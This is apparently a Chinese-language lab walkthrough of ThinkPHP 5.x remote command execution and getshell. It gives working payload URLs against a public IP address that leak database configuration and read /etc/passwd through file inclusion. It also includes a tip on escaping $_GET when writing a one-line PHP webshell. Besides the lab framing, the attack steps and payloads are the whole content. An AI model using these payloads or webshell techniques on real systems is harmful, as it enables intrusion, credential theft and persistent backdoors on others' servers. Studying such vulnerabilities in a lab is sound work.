漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场

第二步:准备工具

第三步:启动工具,进行漏洞检测

#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞
2.目标存在tp5_dbinfo_leak漏洞
payload:
http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
hostname: 127.0.0.1, hostport: , database: , username: , password: root
3.目标存在tp5_file_include漏洞
payload:
http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞

第五步:查看tp5_file_include漏洞

第六步:尝试GetShell


注意:
如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

FROM IYU_